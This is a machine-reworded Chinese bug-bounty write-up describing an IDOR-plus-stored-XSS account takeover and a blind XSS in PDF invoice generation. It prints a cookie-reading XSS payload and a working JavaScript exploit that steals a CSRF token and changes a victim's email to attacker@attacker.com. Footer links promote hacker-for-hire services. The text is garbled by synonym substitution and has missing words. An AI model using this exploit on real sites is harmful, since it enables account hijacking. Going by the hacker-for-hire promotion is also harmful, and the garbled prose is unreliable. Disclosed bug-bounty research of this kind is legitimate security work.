记我的一次账号绑架和BLIND XSS缝隙发现进程

访客5年前黑客资讯715


大家好,本文我要共享的是我参加Hackerone某约请项目,经过方针测验网站的高档功能模块(PRO features)完成了更多攻击面测验,并发现了两个严峻缝隙,获得了$7000美金的不菲奖赏。
之一个缝隙-账号绑架
我发现的之一个缝隙便是不安全方针引证缝隙(IDOR),使用该缝隙我能在每个账户中创立一个 ​element x元素,经过和朋友的沟通,他主张我能够试试在其间注入一些 javascript 脚本,所以我就在某文本区域的 element x 中刺进了以下Payload脚本,完成了用XSS *** 对账户cookie的读取。
‘%22%3E%3Cimg+src%3Dx+onerror%3Dalert(document.cookie)%3E
IDOR:不安全的直接方针引证答应攻击者绕过网站的身份验证机制,并经过修正指向方针链接中的参数值来直接拜访方针方针资源,这类资源能够是归于其他用户的数据库条目以及服务器体系中的隐私文件等等。导致这种状况呈现的原因是,体系在承受用户输入并使用输入信息获取方针之前没有对用户身份权限进行检测。
现在,有了这种IDOR缝隙下的存储型XSS使用途径,并且方针测验网站又没有设置CSP的白名单机制,因而我能够结构一段小脚本,让这段脚原本盗取受害用户的CSRF令牌认证信息(CSRF token),这样能够修正其emailID或以办理员身份把对方添加为好友,直接完成对受害者的账户绑架。
与IDOR缝隙使用相同, javascript 脚本能够在全部账户中完成长途存储,然后经过结构运转,完成对全部方针网站注册账户的绑架,这便是XSS和IDOR缝隙的结合威力。我终究的 javascript Payload使用脚本如下:
function stealEmailToken()
{
var fetchHash = new XMLHttpRequest();
var url = "https://--domain--/--path--/personal/update_email.html";
var datax;
var all_elements;
var vc_email_token='initial';
fetchHash.onreadystatechange=function ()
{
if(fetchHash.readyState==4 && fetchHash.status==200)
{
datax = fetchHash.responseText;
var loot = document.createElement('html');
loot.innerHTML = datax;
all_elements = loot.getElementsByTagName( 'input' );
vc_email_token = all_elements[2].value;
alert('Stole your Email change Token: '+vc_email_token+' ...Tabahi');
//hack(vc_email_token);
}
}
fetchHash.open("GET",url, true);
fetchHash.withCredentials=true;
fetchHash.send();
}
stealEmailToken();
function hack(emailToken)
{
var HackAccount = new XMLHttpRequest();
url= "https://--domain--/--path--/personal/update_email.html";
HackAccount .open("POST",url, true);
HackAccount .withCredentials=true;
var
 data=
'AccountEmailForm%5BsEmail%5D%5Bfirst%5D=attacker%40attacker.com&AccountEmailForm%5BsEmail%5D%5Bsecond%5D=attacker%40attacker.com&AccountEmailForm%5B_token%5D='+emailToken
 ;
HackAccount .setRequestHeader('X-Requested-With','XMLHttpRequest');
HackAccount .setRequestHeader('Content-Type','application/x-www-form-urlencoded');
HackAccount .send(data);
}
这个脚本中,我能从…personal/update_email.html的账户页面中读取 input 元素的  csrf token ,然后使用 hack() 函数来把这个盗取来的 csrf token发送一个更改用户email ID的POST恳求,终究完成账户绑架。上报这个缝隙之后,厂商团队立刻就进行了修正,之后,我也获得了奖赏的$3500赏金。
第二个缝隙 – BLIND XSS
因为方针测验网站注册有付费版的专业高档功能模块,所以我决议付钱来购买进行测验。这个购买付费 *** 有两种,也即信用卡和银行转账。在银行转账 *** 中,会生成一个电子发票并能依照用户在记账时输入的名字邮箱地址等信息,以电邮 *** 发送到用户邮箱中。
因而,在pdf电子发票的生成过程中,我能够尝试着在其间注入一些html元素来看看是否能直接履行脚本,可是,这种 *** 是行不通的。
之后,我就在其间刺进了一个使用 XSSHunter 生成的 BLIND XSS Payload,全部就静等上钩吧。几天之后,我无意间阅读了我的XSSHunter账户,出人意料地发现,那段刺进的BLIND XSS Payload居然在方针测验网站的控制面板办理区域被成功触发了!
XSS Payload成功履行的一同,也一同生成了pdf的电子发票,也便是在这种电子发票主动生成过程中,体系未对输入作安全过滤,导致能够履行XSS

[1] [2]  黑客接单网

相关文章

买家秀接单平台,不收定金的黑客联系方式,找一本电脑黑客的小说

... "rmi://localhost:1099");判别是否有注入,咱们都会的吧。 假如不会我想也没必要看这个了....一般联合查询是先 order by 字段数,...

她已婚有个女儿,她老公爱赌博所以想离婚和我在一

root@vultr:~# cat check ④ SpoolService的bug导致Exchange服务器回连到ntlmrelayx.py,即将认证信息发送到ntlmrelayx.py。 可以在下...

BSidesTLV 2019 CTF WriteUp(附CTF环境)

0×01 前语 BSidesTLV 2019 CTF是2019年6月19日的一次CTF竞赛,原本这个WriteUp早就想写了,可是竞赛完毕没环境复现,直到最近发现官方竟然放出了竞赛环境。 CTF竞赛...

安全黑客接单,黑客能找哪些工作,怎样找黑客改成绩

exec 9>&-http://146.148.60.107:9991/review?pass=QkNURnt4c3NfaXNfbm90X3RoYXRfZGlmZmljdWx0X3JpZ...

商业网站已经没有什么系统软件难题了

商业网站已经没有什么系统软件难题了

原本对系统组件间隙,已经没有什么喜好了. 由于如今补丁下载出得迅速.商业网站已经没有什么系统软件难题了. 即使你应用twwwscan,namp等杀伤力很强的扫描枪也不太可能扫...

手机用户是个骗子,说什么找黑客可以要回被骗

Spring是一个Java/Java此时Spring Cloud Config 1.4.0 to 1.4.53、在Windows 7, Windows Server 2008, and Windows...